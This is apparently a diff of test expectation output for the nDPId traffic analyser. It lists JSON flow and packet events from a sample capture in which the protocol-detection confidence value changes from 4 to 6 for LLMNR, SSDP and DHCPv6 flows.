-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104373025,"flow_last_seen":1470104373127,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408458,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":440,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":7801,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104377720,"flow_last_seen":1470104377820,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104373025,"flow_last_seen":1470104373127,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408458,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":440,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":7801,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104377720,"flow_last_seen":1470104377820,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":7929,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":7929,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":883,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":883,"pkt_l4_len":849,"thread_ts_msec":1654385129190,"pkt":"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"} 
04185{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2812,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2812,"pkt_l4_len":2778,"thread_ts_msec":1654385129190,"pkt":"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\/084Nlxi+eHVyGi4L3ffvbv3735V\/wtqvVelOu8aeG\/yKeHSzXi4D\/XcP5uuDVRTgri6uweYX3vdpsrp6fHp8eXy3TEb3+9ObyKK0uTo\/fLHNZLV6HS\/w7Pb59y\/r0+Lqcl7Au+I49nR5rL2QXWHAIKpoiZWDJKmpvDRGzcMpaOvrZ1Rk+13XZLC\/D4v8jvrwKeWppMiEI8ilFp4TTOrKw1gjnrDdkndmuO50v0+vFzfU5Lvb1zeXuem8v5VFcnvW39P61T\/cu7w8OF8vLRbi6OvnfvThc3ORlPikmxyxF7CTUO6Wi6rzV1BlJpFyQJRd\/uHhzwkfuiI\/oELc7vcZtP8HNPVqncll+Hj47Gv7kxSqX85N1fr04u3q1uiyLT505XKzenBDeGa\/DZT75yWp1dl4OF\/j+erXExcwn0Rd2WLLUKrP2+OVZwI91SCaIWjuXyXXKxtQFL7hjR5yqSKypHG5Odky7nvVrfLzF5rMroExvn23h1qYRuuL0GB+bOwFgiwvs8HwZxaIkQ7m4qCzWYKpugu5I8SnR3UkrbVKsjq3VNjuncRWSsdlQLeyz3BPdrcyM0VW6DbnOw+iSVR3l7IurMgBfp4XwFCmbYAVTAc2pBbljxSckdyftTNYSa\/TeWoEnNVjy0ojINeT+1X7kDjIzJpcEfIwG\/gIRrEJnqIfTKqtM4lh9imQrvlDBS1jkBtiOEn6ILDan+zv4B27ft6IknRBzROnlsINj\/966p\/\/54z\/e\/fpXj7inLFr5p+b0WFlBXSGVhXKUXI2wloqt1yFGuGkpB84tmGM\/UvwhdzvQRvvlg7QMVHUMmfDM+aQUQoj+6dOqKCOUUvuZymGFHz\/f\/n3+qbNNLCV7bPIgV3VaELznnEJKglOSoSonZcpUsuXgagNrOVp8SnKHdVchVBBS2KCrd5KTyMJh3SWT0DIPbvl9uzwmstrKzJncVoGVuyVXdrhfNXOMOinY2upzciVKn4VU3qnUxuaOFJ+S3EHaah10ccXaKr0UQiL\/YaV12HZ0SWF4Yp9K7lZmzuS6RjZX35IrOhaZTZIccyUVkddxqoSQk0JYVZIKTWzuSPEpyR2kvRMxJa6pwj2w2iM9g4xjikkJhFe0r7ewlZkzudyIXHtLLnfZKgqOmWqNiK8QXLlAJgebKnIC3CYPO1J8SnIHaR9sjBmuEhlKwnukQLXOpFKfDxA07DVPtblbmTmSu4vjSN4Fcn\/+w+OBHNk2ToUUt7seyU5lVbSKpXBkDZNUkedGnjaTtARPcXALpyw0jBafDvA76QRbLIRR2URVWcsiatEmC+0KB2H9XoHcTmaOgG8LDb4VubehOInOcVLMRlXZx3MmpeSMo1itTSpF04bckeJTkjtIB5uly4hdLb5jV+BQ2KicqLGyCn7Ykp5mmqXYysyZ3DYpCITevVNBSJ5FFBJJWVM0\/EASyhZlHWIaYcGzKw3c4dHiU5I7rNvYSCIwV8lGiByV1CZEKkpaVZBB3NPmbmXmSO7OqYA\/PCSH\/\/TPd\/\/6+pH
kMBk4Hg2KEVIy+HZedZH6xEQmhHs+CoEami5VoJ0hoapWaKgnTepTjBWfkO+dNMskVF81833ngsqOnUBumFDHj8WGuB\/fg8wc+d76FA6tOU3IRdsNyEWKzUvFQYpiQkLMpxKKaUJTRZMFRfDbwjLLkeJTkjtIhwCzHBDb1pJ1qOi1KeQsHCqKtlIadqQn+hTDCmdMrm3TuyAlCsAgl7qAKhQ49UEoklGQYrxGkgIFfckiDI1T09rckeJTkjtIV1ctkmpJo9PIuEQiG4tHFYFd8VkZt6fN3crMkdw7nwLF5KEh8puv\/v3FV486FY0qzgp3oJPwKjxSb2xICYocjGarUYqNpRqnWoR6PEb4Idi4RPeN5a7w\/D0Nir0owSvmOQK361BsVI4wqFF2kbNURGBHBOvJes8AyGr0mMJoWNFgh+cxwpOh1IuiWYbsnFEybRxGtr1Vcja6gIyhYC7BRYFSgTAeyVMuse8rb4HSGOGHKO3M0Af1v7xaXZQXaG\/+ZFMu1j9eXb\/ou5gBlaHukxc\/\/FHnInxFL7LUVqCnQEcn0E1gScmCH5XHtt7dB\/geO9gvk6SRas7w6jZNg2zh9XdwEgO2T8HIQVlGhBqwqwZjbCi+km5Skh0j\/BDeJ26pvShmPFjPEaWdD0dgaUgMffn1d3\/7xWM+nG6UGDIKwAUk+BKaBqOrTFKwR9NRyDZZGAt0Yw1p60kDlDHCUwEne1Ficn6OwA0+nGuFEnoeULeTyDEilRxLVD57YauXmuHs1KwULBkK9Q02X2lGik+H1FZ4zkRp1Sb3Z1DwwuOKFAqaQRNcmegBGJrpk65SYv5MUULLjrQttkQ5Wn06poZ1zxGq3b6IUt92W3z3my++\/ebR1IZok7tT3D\/V1mCIz5OUqmCEQ7IUMjMabZDKwxevK5mhbjDl1jha\/CF3O1\/+g4KJuyHXO+kQTES8hCfNx5or2jAQQChMWVqHSpEfAqj7iZQPb0neyXz8fL9\/2FO0acLAuMcturIrSnj0CsWig0PaOWDSMaGbCH3mcO3QRdRgGx4tPiW6w7o1C0zdpoxuIU7FGFcVWczAlISqNschI\/lUdLcyc0aX2ySUURe5Rdd2psaIYi1hnqxmJGzQoqtDCV5plBHyzvpMa3VHik+J7iCNwY8UseMYjCcn5NMxZh5SyTWghYoxtrx9ZJ+K7lZmzuiqNllHxWjahMOgu4SjAHAoBOIeRVribAj0z9RK8Fd1tlHkJlZ3pPiU6A7S2XqXhNUYBUTBr2YhHDwkHTX5mLDn7InuVmaO6O4cYr7rIHr399+9++XvH0kUsWpToZG6nyLzznTwHVDmY19Q1U0BhW30JODe4wCUhG4aNXiGU9rm0eLTAX4njYFadN33z3HJ8P6VZrQkw1y7EByFPd2KnczHD\/h7x0vJN2rulLfoYjIaOU6HOVNM5MGxwN6KUxUURtdQGUJ7stMtbLMcKz4hunfSyWj0Csn+zAFPWLFChtdK+Fg4VQOnaOxlm3crnDG6rNsMO0kpb3uIcKxQKDjrBFW3IkvyyHiZWjN2W0xfBoUzmRq4FaPFp0R3WLfxxohqskQ1QpBkbyUOm6o4CgbRHKZO90R3KzNHdF++ffn2v6mfUJ+ITQAADQowDQoNCg=="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385129449,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"flow_min_l4_payload_len":916,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":916,"flow_avg_l4_payload_len":916,"midstream":1,"thread_ts_msec":1654385129449,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1654385129449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":982,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":982,"pkt_l4_len":948,"thread_ts_msec":1654385129449,"pkt":"tKXvZygQnLbQ0+MzCABFAAPIWPdAAEAGbIDAqAJ+oXUNHbioAFBarhYgKPds64AYAfZ1cwAAAQEICrrF6hOXEOt4R0VUIC9hcGkvbWVzc2FnZXMvbGlzdEZvcllpbmdzaGk\/Y2xpZW50LXVpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmbWluX2lkPTAmYWNjZXNzX3Rva2VuPSZfYnJhbmQ9R29vZ2xlJl9tb2RlbD1zZGtfZ3Bob25lX3g4NiZfb3Y9QW5kcm9pZDExJl9jcHU9aTY4NiZfcmVzb2x1dGlvbj0xMDgwJTJDMTc5NCZfcGFja2FnZT1jb20uc2NlbmV3YXkua2Fua2FuJl92PTIuOC4yLjEmX2NoYW5uZWw9MWt4dW4mX2NhcnJpZXI9MzEwMjYwJl9hbmRyb2lkX2lkPWI5ZTI4Nzc2MzU0ZDI1OWUmX25ldHdvcms9d2lmaSZfYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZfdWRpZD1lNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkmJl9jb3VudHJ5PVVTJl9sb2NhbGU9ZW4mXz0xNjU0Mzg1MTI1IEhUVFAvMS4xDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ2xpZW50LUJyYW5kOiBHb29nbGUNCkNsaWVudC1EZXZpY2U6IHNka19ncGhvbmVfeDg2DQpDbGllbnQtT3M6IEFuZHJvaWQxMQ0KQ2xpZW50LUNwdTogaTY4Ng0KQ2xpZW50LVJlc29sdXRpb246IDEwODAsMTc5NA0KQ2xpZW50LVBhY2thZ2U6IGNvbS5zY2VuZXdheS5rYW5rYW4NCkNsaWVudC1WZXJzaW9uOiAyLjguMi4xDQpDbGllbnQtU291cmNlOiAxa3h1bg0KQ2xpZW50LVNpbTogMzEwMjYwDQpDbGllbnQtQW5kcm9pZElk
